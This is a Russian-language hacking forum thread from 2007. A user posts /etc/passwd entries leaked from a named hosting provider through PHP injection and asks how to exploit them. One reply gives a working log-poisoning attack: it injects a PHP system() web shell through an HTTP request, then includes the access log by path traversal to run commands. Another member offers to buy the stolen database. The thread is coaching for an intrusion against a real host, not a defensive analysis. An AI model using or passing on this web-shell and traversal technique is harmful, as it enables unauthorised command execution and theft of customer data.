Как воспользоваться php иньекцией

Discussion in 'Песочница' started by ANTI-4URKA, 28 Aug 2007.

  1. ANTI-4URKA

    ANTI-4URKA New Member

    Joined:
    19 Aug 2007
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    вот с хостера robo-host.ru
    выводиться в таком виде пхп иньекция:
    подскажит как воспользоваться и что даёт этот код:

    dvdrec:x:32383:32384::/home/dvdrec:/bin/false dyakoff:x:32386:32387::/home/dyakoff:/usr/local/cpanel/bin/noshell

    egtgame:x:32388:32389::/home/egtgame:/usr/local/cpanel/bin/jailshell elektrok:x:32391:32392::/home/elektrok:/usr/local/cpanel/bin/jailshell

    elitmebe:x:32392:32393::/home/elitmebe:/usr/local/cpanel/bin/jailshell wapoorg:x:32393:32394::/home/wapoorg:/usr/local/cpanel/bin/noshell
     
    #1 ANTI-4URKA, 28 Aug 2007
  2. ANTI-4URKA

    ANTI-4URKA New Member

    Joined:
    19 Aug 2007
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    что?
    обьясни плз я непонимаю (
     
    #2 ANTI-4URKA, 28 Aug 2007
  3. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    543
    Likes Received:
    274
    Reputations:
    51
    ищи файл acces_log & error_log
    затем посылай серверу запрос:
    GET <?system($_GET["cmd"]);?> HTTP/1.1

    HOST: site.com

    Затем через инклуд подключаешь найденный access_log, и выполняешь команды...
    www.site.com/index.php?page=../../../../../../../../logs/access_log&cmd=id

    правда мало шансов что проканает.... :))

    Видео
    (с)homo-sapiens
     
    #3 aka PSIH, 28 Aug 2007
    Last edited: 28 Aug 2007
  4. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Вот еще советую прочитать:
    [thread=47759]вопрос по etc/passwd[/thread]
     
    #4 n1†R0x, 28 Aug 2007
    1 person likes this.
  5. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    n1†R0x
    Посмотри там 1 пост там есть /etc/passwd.

    ANTI-4URKA
    Сломаешь стукни мне, возможно куплю бд.
     
    #5 guest3297, 28 Aug 2007
  6. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    [ cash ]
    В той теме задавался похожий вопрос, "что можно поиметь с etc/passwd". На мой взгляд, ettee достаточно развернуто ответил на него.
     
    #6 n1†R0x, 28 Aug 2007
  7. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    n1†R0x
    возможно я наркоман но тут нету постов     ettee...
     
    #7 guest3297, 28 Aug 2007
  8. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    [ cash ]
    В пятом посте ссылочка на тему, я про нее (про тему) и говорил )))
     
    #8 n1†R0x, 28 Aug 2007
    Last edited: 28 Aug 2007
(You must log in or sign up to post here.)